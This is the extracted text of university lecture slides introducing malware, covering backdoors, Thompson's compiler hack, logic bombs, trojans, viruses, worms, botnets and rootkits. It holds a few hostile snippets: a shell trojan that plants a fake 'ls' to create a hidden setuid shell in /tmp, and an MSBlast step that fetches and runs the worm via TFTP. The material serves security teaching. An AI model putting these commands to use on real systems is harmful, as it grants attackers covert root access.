Introduction to
Malware
Dan Fleck
CS469 Security Engineering
Reference: Angelos Stavrou’s ISA564 and Computer Security by Bishop
11
Coming up: What is Malicious Software?
What is Malicious Software?
Malicious Software (a.k.a. Malware)
• Software designed to infiltrate or damage a computer system,
without the owner's informed consent
-- http://en.wikipedia.org/wiki/Malware
• Examples:
• Viruses, worms, Trojan horses, spyware, and other malicious and
unwanted software
• How about adware?
• Malware references the intent of the creator, rather than any
particular features
• DRM v.s. Rootkit (e.g., Sony CD rootkit)
Coming up: Why should we care?
2
Why
should
we care?
Source: Symantec Internet Threat
Report 2012
3
Coming up: Why should we care?
Why
should
we care?
Source: Symantec Internet Threat
Report 2012
4
Coming up: Why should we care?
Why
should
we care?
Source: Symantec Internet Threat
Report 2012
5
Coming up: Taxonomy of Malicious Software
Taxonomy of Malicious Software
6
Coming up: Trapdoor/Backdoor
Trapdoor/Backdoor
• Secret entry point into a system
• Specific user identifier or password that
circumvents normal security procedures.
• Commonly used by developers
• Could be included in a compiler.
• Lets see Thompson’s Compiler
7
Coming up: Thompson's Compiler
• Modify the compiler so that when it compiles
login , login accepts the user's correct password
or a fixed password (the same one for all users)
• Then modify the compiler again, so when it
compiles a new version of the compiler, the extra
code to do the first step is automatically inserted
• Recompile the compiler
• Delete the source containing the modification
and put the undoctored source back
November 1, 2004
Thompson's Compiler
Slide
#198
8
Coming up: The Login Program
The Login Program
user password
login source
correct compiler
login executable
logged in
user password or
magic password
login source
doctored compiler
login executable
logged in
Coming up: The Compiler
9
login source
compiler source
correct compiler
compiler executable
November 1, 2004
The Compiler
correct login executable
login source
compiler source
doctored compiler
compiler executable
rigged login executable
Coming up: Thompson’s Lesson
Slide
#1910
10
Thompson’s Lesson
Verifying the source code isn’t always
enough!
11
Coming up: Logic Bomb
Logic Bomb
• Embedded in legitimate programs
• Activated when specified conditions met
• E.g., presence/absence of some file; Particular date/time or
particular user
• When triggered, typically damages system
• Modify/delete files/disks
• Example: Disgruntled employee adds trigger that when
employee’s salary record deleted from DB, all personnel
records deleted also.
Can you think of other logic bombs?
Coming up: Trojan Horse
12
Trojan Horse
Program with an expected
and hidden effect
• Appears normal/expected
• hidden effect violates
security policy
User tricked into executing
Trojan horse
• Expects (and sees) expected
behavior
• Hidden effect performed
with user’s authorization
Coming up: Trojan Horse Example: NetBus
Attacker
cat >/homes/victim/ls <<eof
cp /bin/sh /tmp/.xxsh
chmod u+s,o+x /tmp/.xxsh
rm ./ls
ls $*
eof
Victim
ls
13
Trojan Horse Example: NetBus
• Designed for Windows NT system
• Victim uploads and installs this
• Usually disguised as a game program, or in one
• Acts as a server, accepting and executing
commands for remote administrator
• This includes intercepting keystrokes and
mouse motions and sending them to attacker
• Also allows attacker to upload, download files
14
Coming up: Virus
Virus
• Program that inserts itself into one or more files and
performs some action
• Insertion phase is inserting itself into file
• Execution phase is performing some (possibly null) action
• Self-replicating code
• Generally tries to remain undetected
• Pseudocode
If spread condition then
For target files
if not infected then alter to include virus
Perform malicious action
Execute normal program (step done only by Trojan horses to remain hidden)
Coming up: Early Virus Reports
14
15
Early Virus Reports
• Brain (Pakistani) virus (1986)
• Written for IBM PCs
• Alters boot sectors of floppies, spreads to
other floppies
• MacMag Peace virus (1987)
• Written for Macintosh
• Prints “universal message of peace” on
March 2, 1988 and deletes itself
Coming up: Virus Types
16
Virus Types
Boot Sector
• Problem: How to ensure virus “carrier” executed?
• Solution: Place in boot sector of disk
• Run on any boot
• Propagate by altering boot disk creation
• Less common with few boots off floppies
Brain virus
used this
Executable
• Malicious code placed at beginning of legitimate program (EXE or .COM
• Runs when application run
15
17
Coming up: Virus Types
Virus Types
Macro Virus
• Infected “executable” isn’t machine code
• Relies on something “executed” inside
application data
• Common example: Macros
• Otherwise similar properties to other viruses
• Architecture-independent
• Application-dependent
16
18
Coming up: Macro Virus Example
Macro Virus Example
• Melissa
• Infected Microsoft Word 97 and Word 98 documents
• Windows and Macintosh systems
• Invoked when program opens infected file
• Installs itself as “open” macro and copies itself into
Normal template
• This way, infects any files that are opened in future
• Invokes mail program, sends itself to everyone in
user’s address book
19
Coming up: Virus Types
Virus Types
Armored
• Encrypt virus
• Prevents “signature” to detect virus
Virus code
Deciphering
routine
Stealth
• Conceal Infection
• Trap read and disinfect
• Let execute call infected file
Terminate and Stay Resident (TSR)
Enciphered virus code
Deciphering k ey
• Request for file length: return length of
uninfected file
• Request to open file: temporarily
disinfect file, and reinfect on closing
• Request to load file for execution: load
infected file
• Stays active in memory after application complete
• Allows infection of previously unknown files
• Trap calls that execute a program
Coming up: Virus Types
17
20
Virus Types
Polymorphic
• A virus that changes its form each time it inserts itself into
another program
• Idea is to prevent signature detection by changing the
“signature” or instructions used for deciphering routine
• At instruction level: substitute instructions
• At algorithm level: different algorithms to achieve the same
purpose
• Toolkits to make these exist (Mutation Engine, Trident
Polymorphic Engine)
Coming up: Polymorphic Example
17
21
Polymorphic Example
• These are different instructions (with different
bit patterns) but have the same effect:
•
•
•
•
add 0 to register
subtract 0 from register
xor 0 with register
no-op
• Polymorphic virus would pick randomly from
among these instructions
22
Coming up: Worm
Worm
• Runs independently
• Does not require a host program
• Propagates a fully working version of itself to other machines
• Carries a payload performing hidden tasks
• Backdoors, spam relays, DDoS agents; …
• Phases
• Probing Exploitation  ReplicationPayload
18
23
So, how is a virus different from a worm?
Coming up: Work Propagation
Work Propagation
19
24
Coming up: MSBlast Worm (Aug 2003)
TCP protocal: Direction: Inbound
Local end point ports: 135
Application: ANY
Remote End Point: ANY/ANY
2. Binds
Rule
valid:svchost.exe
ALWAYS to port
4444/TCP
via injected code
Action:
DENY
MSBlast Worm (Aug 2003)
1. Exploits target on port 135/TCP
3. Connects to target on port 4444/TCP
5. Creates “TFTP Server” on port 69
6. Sends “TFTP” command to shell
tftp –l 192.168.0.1 GET msblast.exe
4. Creates shell “cmd.exe” and binds
it to port 4444/TCP
Runs TFTP command: teleports
msblast.exe file
8. Sends “START msblast.exe” command
9. Runs worm on target
10. Closes connection
Infected
Coming up: Zombie
11. Shell closes
New Victim
20
25
Zombie
• Secretly takes over another networked computer by exploiting
software flows
• Builds the compromised computers into a zombie network or
botnet
• Uses it to indirectly launch attacks
• E.g., DDoS
Lets see how we create
zombies..
21
26
Coming up: Zombie
Computer
Coming up: Zombie: Steps - 1
Lets see how we create
zombies..
27
Zombie: Steps - 1
Unsecured Computers
Attacker
1
Attacker scans Internet for unsecured
systems that can be compromised
22
28
27
Coming up: Zombie: Steps - 2
Zombie: Steps - 2
Unsecured Computers
Attacker
2
Attacker secretly installs zombie agent
program, turning unsecured computers
into zombies
23
29
28
Coming up: Zombie: Steps - 3
Zombie: Steps - 3
Zombies
Attacker
3
Zombie agents “phone home” and
connect to a master server
Master Server
Coming up: Zombie: Steps - 4
24
30
29
Zombie: Steps - 4
Zombies
Attacker
4
Attacker sends commands to Maser
Server to launch a DDoS attack against a
targeted system
Master Server
Coming up: Zombie: Steps - 5
25
31
30
Zombie: Steps - 5
Zombies
TARGET
Attacker
5
Master server sends signal to zombies to
launch attack on targeted system
Master Server
Coming up: Zombie: Steps - 6
26
32
31
Zombie: Steps - 6
Zombies
TARGET
6
Request
Denied
Attacker
Target system is overwhelmed by zombie
requests denying requests from normal
users
Master Server
Coming up: Rootkit
User
27
33
32
Rootkit
• “A rootkit is a set of programs and code that
allows a permanent or consistent, undetectable
presence on a computer”
• Goals:
• Hide malicious resources (e.g., processes,
files, registry keys, open ports, etc.)
• Provide hidden backdoor access
28
34
33
Coming up: Linux RootKit III
Linux RootKit III
ls
du
ifconfig
netstat
chfn
chsh
inetd
login
passwd
ps
top
rshd
syslogd
linsniffer
fix
z2
wted
lled
bindshell
tcpd
Coming up: Rootkit
Trojaned! Hide files
Trojaned! Hide files
Trojaned! Hide sniffing
Trojaned! Hide connections
Trojaned! User->r00t
Trojaned! User->r00t
Trojaned! Remote access
Trojaned! Remote access
Trojaned! User->r00t
Trojaned! Hide processes
Trojaned! Hide processes
Trojaned! Remote access
Trojaned! Hide logs
Packet sniffer!
File fixer!
Zap2 utmp/wtmp/lastlog eraser!
wtmp/utmp editor!
lastlog editor!
port/shell type daemon!
Trojaned! Hide connections, avoid denies
29
35
34
Rootkit
• Simple rootkits:
• Modify user programs (ls, ps)
• Detectable by tools like Tripwire
• Sophisticated rootkits:
• Modify the kernel itself
• Hard to detect from userland
30
36
35
Coming up: Rootkit Classification
Rootkit Classification
Replace apps
Coming up: Rootkit Classification
Add code to all apps
See:
http://www.phrack.org/issu
es.html?issue=62&id=12
Replace/modify kernel
modules
31
37
36
Rootkit Classification
Run entire OS in a
virtual machine
32
38
37
Coming up: Lessons
Lessons
• Malware comes in many types and styles
• It’s not going away and will always hit new platforms as they
come out
• We’ll need multiple approaches to defend against them.
Next up: Malware Defense!
End of presentation
39
38